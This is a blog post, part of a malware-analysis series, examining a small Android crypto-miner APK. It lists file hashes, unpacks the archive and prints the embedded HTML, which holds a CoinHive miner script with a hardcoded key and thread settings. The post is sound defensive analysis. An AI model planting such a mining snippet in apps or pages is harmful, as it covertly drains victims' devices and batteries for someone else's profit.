Fishing for Malware — Part Two: Android Crypto Miner

Published 2022-01-23
Edited 2023-10-25 (git:05b41b4)


Indicators of Compromise

  • MD5: 8844985fcd57b0311d1d4cb2ec13a1ef
  • SHA-1: a0c07fe897515e5575a72f94f9dea8c077a410ff
  • SHA-256: 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257
  • Package name: com.ufo.miner
  • Connected domain:
  • Unexpected high utilization of Android device resources


  • Magic: APK archive
  • Language: Java
  • Size: 45.43 KB

See this file on VirusTotal

As the heading and package name imply, this is a crypto miner developed for Android devices. However, that isn’t particularly interesting on its own, and 45.43 KB is small — suspiciously small — so let’s take a look inside the file.



 1$ unzip 
 3  inflating: META-INF/MANIFEST.MF    
 4  inflating: META-INF/CERT.SF        
 5  inflating: META-INF/CERT.RSA       
 6 extracting: res/drawable-xhdpi-v4/ic_launcher.webp  
 7  inflating: AndroidManifest.xml     
 8 extracting: res/drawable-hdpi-v4/ic_launcher.webp  
 9  inflating: res/layout/activity_main.xml  
10  inflating: assets/run.html         
11 extracting: resources.arsc          
12 extracting: res/drawable-mdpi-v4/ic_launcher.webp  
13  inflating: classes.dex             
14 extracting: res/drawable-xxhdpi-v4/ic_launcher.webp  
15  inflating: res/menu/main.xml     

I see an HTML file, some PNG images, and some other files, the extensions of which I am not familiar with. Let’s check them out.

1$ cat assets/run.html
1<script src=""></script>
3    var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE',{
4        threads:4,
5        throttle: 0.8
7    miner.start();

Sigh. It remains boring. However, by searching for the crypto wallet hardcoded into the HTML, I came across a presentation from Fortinet, indicating that this CoinHive-related malware may have been a part of the Trinity Android P2P malware bot, which is quite interesting. Alas, that is a rabbit hole for another blog post.

Each PNG was a rescaled version of the stock Android logo — not much to say beyond that.

How I assume this malware works:

  1. The victim’s stock web browser embeds into an app frame in the background.

  2. Instructions are received from CoinHive.

  3. The miner starts working, sending proof of work to the address hardcoded into the script.

  4. The victim’s phone gets too hot, or the battery drains too fast; upon seeing the culprit as com.ufo.miner in the power report of the device, the victim promptly uninstalls the application.

Personal Thoughts

This is a very small application and doesn’t perform any particularly special operations; in fact, I debated including it in this series at all. More interesting that the malware itself to me, however, is the platform it targets.

In the context of cryptocurrency mining, Android devices are not particularly powerful, and therefore not as lucrative as most other computing machines. It would take a vast, vast array of Android smartphones/tablets/et cetera to generate even a moderate amount of the more popular cryptocurrencies available today, such as Bitcoin. This issue is exacerbated by the ease of detection; many users infected with this malware, I would reason, could trivially identify its existance via the power usage utility on their respective Android device, thereby shortening runtime.

A humorus reference to Coinhive’s coinhive.min.js script I found online: “Stack Overflow: [Coinhive header] automatically appears in my website”

And, finally, kudos to Troy Hunt, who bought the Coinhive domain and shut it down.

Thanks so much for reading!

Fishing for Malware: Part 3 →
← Fishing for Malware: Part 1